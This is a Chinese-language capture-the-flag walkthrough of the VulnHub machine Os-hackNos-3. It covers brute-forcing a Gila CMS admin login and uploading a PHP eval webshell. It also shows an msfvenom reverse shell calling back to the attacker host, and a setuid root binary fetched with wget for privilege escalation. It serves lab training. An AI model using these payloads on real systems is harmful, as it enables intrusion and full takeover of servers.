kali ip:192.168.1.193
target ip:192.168.1.202
靶机下载:hackNos: Os-hackNos-3 ~ VulnHub
靶机目标:普通用户的user.txt和root用户的root.txt
步骤一:使用nmap进行网络扫描,发现目标192.168.1.202
为入侵目标靶机...
nmap -sn 192.168.1.0/24 nmap -sS -A -T5 192.168.1.202 -O
步骤二:使用gobuster
工具对该网站进行目录扫描发现/scripts/
路径并访问...并无实际利用点...
gobuster dir -u http://192.168.1.202/ -w /home/flao/桌面/wordlist.list -x .php,.zip,.txt,.html
步骤三:访问这几个文件无果后回到站点主页面,发现 You need extra WebSec
在其站点后面添加路径/websec/
发现是一套CMS站点并扫描器后台登录页面/websec/admin
在title处发现Gila CMS
字样...并搜索发现为一套开源的CMS...
步骤四:使用搜索引擎检索下Gila CMS的可利用漏洞找到以下两个漏洞....文件包含漏洞需要登录后台,所以接下来的思路就是尝试弱口令爆破....
- Gila CMS < 1.11.1 - Local File Inclusion - Multiple webapps Exploit #文件包含漏洞
- Gila CMS 1.9.1 - Cross-Site Scripting - PHP webapps Exploit #XSS跨站脚本攻击
步骤五:使用cewl工具对其网站信息进行收集并制作成字典...
cewl http://192.168.1.202/websec/ > passwd.txt
步骤六:这里使用网站首页的邮箱作为是用户名,passwd.txt
作为密码开始使用Burpsuite对后台进行延迟暴力破解....得出:contact@hacknos.com:SecurityX
步骤七:进入后台后尝试GetShell,在Content>>Media
处可以上传图片,Content>>File Manager
处可以编辑PHP文件....在Content>>File Manager
处进入tmp
目录编辑.htaccess
文件,将里面的内容全部删除点击Save
并进入tmp/media_thumb/
目录下上传一句话文件,访问并使用蚁剑进行链接...
<?php @eval($_POST['z4pts']);?> http://192.168.1.98/websec/tmp/media_thumb/test.php
步骤八:使用蚁剑进行链接并上传由msf生成的Shell文件...在kali中启动msfconsole
并进去到监听模式下...并打开浏览器访问shell.php
进行shell反弹....
#MSF生成PHP木马 msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.193 LPORT=1234 R > shell.php chmod 777 shell.php #kali中启动msfconsole接受Shell反弹 use exploit/multi/handler set payload php/meterpreter/reverse_tcp set LHOST 192.168.1.193 set LPORT 1234
步骤九:在meterpreter
下输入shell
命令进入目标shell环境并执行以下命令进入bash
环境....
python -c 'import pty; pty.spawn("/bin/bash")'
步骤十:编译以下程序源码并上传到靶机目录下,给于777权限并执行获取高权限...并拿去Flag...
#include<stdio.h> #include<unistd.h> #include<sys/types.h> int main() { setuid(0); setgid(0); system("/bin/bash"); return 0; }
#kali中的编译操作 root@kali:~# gcc exp.c -o exp luci11.c: In function ‘main’: luci11.c:9:3: warning: implicit declaration of function ‘system’ [-Wimplicit-function-declaration] 9 | system("/bin/bash"); | ^~~~~~ root@kali:~# python -m SimpleHTTPServer Serving HTTP on 0.0.0.0 port 8080 ...
#目标靶机操作 www-data@hacknos:/var/www/html/websec/tmp/media_thumb$ wget http://192.168.1.193:8080/exp -O exp <ia_thumb$ wget http://192.168.1.193:8080/exp -O exp --2022-02-22 12:48:35-- http://192.168.1.193:8080/exp Connecting to 192.168.1.193:8080... connected. HTTP request sent, awaiting response... 200 OK Length: 16224 (16K) [application/octet-stream] Saving to: 'exp' exp 100%[===================>] 15.84K --.-KB/s in 0s 2022-02-22 12:48:35 (428 MB/s) - 'exp' saved [16224/16224] www-data@hacknos:/var/www/html/websec/tmp/media_thumb$ ls ls assetsgila-logo.png exp flao.php shell.php www-data@hacknos:/var/www/html/websec/tmp/media_thumb$ whoami whoami www-data www-data@hacknos:/var/www/html/websec/tmp/media_thumb$ chmod 777 exp chmod 777 exp www-data@hacknos:/var/www/html/websec/tmp/media_thumb$ cpulimit -l 100 -f ./exp <ml/websec/tmp/media_thumb$ cpulimit -l 100 -f ./exp Process 3771 detected root@hacknos:/var/www/html/websec/tmp/media_thumb# whoami whoami root root@hacknos:/var/www/html/websec/tmp/media_thumb# cd /root cd /root root@hacknos:/root# ls ls root.txt snap root@hacknos:/root# cat root.txt
###第二种提权方式:
- 切换到home目录下发现存在账户blackdevil用户
- 在/var/local/database文件中发现存在加密值
- 进行解密的到blackdevil用户密码进行su切换
- sudo -l查询sudo权限为ALL 直接sudo su执行得到root用户权限..
www-data@hacknos:/var/www/html/websec/tmp/media_thumb$ cd /home cd /home www-data@hacknos:/home$ ls ls blackdevil www-data@hacknos:/home$ cd /var/local cd /var/local/ www-data@hacknos:/var/local$ ls ls database www-data@hacknos:/var/local$ cat database cat database Expenses Software Licenses,$2.78 Maintenance,$68.87 Mortgage Interest,$70.35 Advertising,$9.78 Phone,$406.80 Insurance,$9.04 Opss;fackespreadsheet www-data@hacknos:/var/local$ su blackdevil su blackdevil Password: Security@x@ blackdevil@hacknos:/var/local$ sudo -l sudo -l [sudo] password for blackdevil: Security@x@ Matching Defaults entries for blackdevil on hacknos: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User blackdevil may run the following commands on hacknos: (ALL : ALL) ALL blackdevil@hacknos:/var/local$ sudo su sudo su root@hacknos:/var/local# whoami whoami root root@hacknos:/var/local#
###参考资料: